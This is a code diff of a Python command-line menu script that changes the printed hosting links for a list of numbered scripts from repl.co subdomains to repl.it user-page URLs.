@@ -780,7 +780,7 @@ def main():
  if schoice == '2':
   clear()
   print(s2+':')
-  print('Link:','https://'+s2+'.craexz.repl.co')
+  print('Link:','https://repl.it/@VO1D/'+s2)
   print("")
   choice = input("Press enter to go back to the script list")
   clear()
@@ -803,7 +803,7 @@ def main():
  if schoice == '4':
   clear()
   print(s4+':')
-  print('Link:','https://'+s4+'.craexz.repl.co')
+  print('Link:','https://repl.it/@VO1D/'+s4)
   print("")
   input("Press enter to go back to the script list")
   main()
@@ -811,7 +811,7 @@ def main():
  if schoice == '5':
   clear()
   print(s5+':')
-  print('Link:','https://'+s5+'.craexz.repl.co')
+  print('Link:','https://repl.it/@VO1D/'+s5)
   print("")
   input("Press enter to go back to the script list")
   main()
@@ -819,7 +819,7 @@ def main():
  if schoice == '6':
   clear()
   print(s6+':')
-  print('Link:','https://'+s6+'.craexz.repl.co')
+  print('Link:','https://repl.it/@VO1D/'+s6)
   print("")
   print("1) Run the script directly")
   print("2) Go back to the script list")
@@ -834,7 +834,7 @@ def main():
  if schoice == '7':
   clear()
   print(s7+':')
-  print('Link:','https://repl.it/@VO1D/'+s7+'/')
+  print('Link:','https://repl.it/@VO1D/'+s7)
   print("")
   input("Press enter to go back to the script list")
   clear()
@@ -843,7 +843,7 @@ def main():
  if schoice == '8':
   clear()
   print(s8+':')
-  print('Link:','https://repl.it/@VO1D/'+s8+'/')
+  print('Link:','https://repl.it/@VO1D/'+s8)
   print("")
   print("1) Run the script directly")
   print("2) Go back to the script list")
@@ -858,7 +858,7 @@ def main():
  if schoice == '9':
   clear()
   print(s9+':')
-  print('Link:','https://'+s9+'.craexz.repl.co')
+  print('Link:','https://repl.it/@VO1D/'+s9)
   print("")
   print("1) Run the script directly")
   print("2) Go back to the script list")
@@ -873,7 +873,7 @@ def main():
  if schoice == '10':
   clear()
   print(s10+':')
-  print('Link:','https://'+s10+'.craexz.repl.co')
+  print('Link:','https://repl.it/@VO1D/'+s10)
   print("")
   print("1) Run the script directly")
   print("2) Go back to the script list")
@@ -888,7 +888,7 @@ def main():
  if schoice == '11':
   clear()
   print(s11+':')
-  print('Link:','https://'+s11+'.craexz.repl.co')
+  print('Link:','https://repl.it/@VO1D/'+s11)
   print("")
   print("1) Run the script directly")
   print("2) Go back to the script list")
@@ -903,7 +903,7 @@ def main():
  if schoice == '12':
   clear()
   print(s12+':')
-  print('Link:','https://'+s12+'.craexz.repl.co')
+  print('Link:','https://repl.it/@VO1D/'+s12)
   print("")
   print("1) Run the script directly")
   print("2) Go back to the script list")
@@ -917,7 +917,7 @@ def main():
  if schoice == '13':
   clear()
   print(s13+':')
-  print('Link:','https://'+s13+'.craexz.repl.co')
+  print('Link:','https://repl.it/@VO1D/'+s13)
   print("")
   print("1) Run the script directly")
   print("2) Go back to the script list")
@@ -932,7 +932,7 @@ def main():
  if schoice == '14':
   clear()
   print(s14+':')
-  print('Link:','https://'+s14+'.craexz.repl.co')
+  print('Link:','https://repl.it/@VO1D/'+s14)
   print("")
   print("1) Run the script directly")
   print("2) Go back to the script list")
@@ -947,7 +947,7 @@ def main():
  if schoice == '15':
   clear()
   print(s15+':')
-  print('Link:','https://'+s15+'.craexz.repl.co')
+  print('Link:','https://repl.it/@VO1D/'+s15)
   print("")
   print("1) Run the script directly")
   print("2) Go back to the script list")
@@ -962,7 +962,7 @@ def main():
  if schoice == '16':
   clear()
   print(s16+':')
-  print('Link:','https://'+s16+'.craexz.repl.co')
+  print('Link:','https://repl.it/@VO1D/'+s16)
   print("")
   print("1) Run the script directly")
   print("2) Go back to the script list")
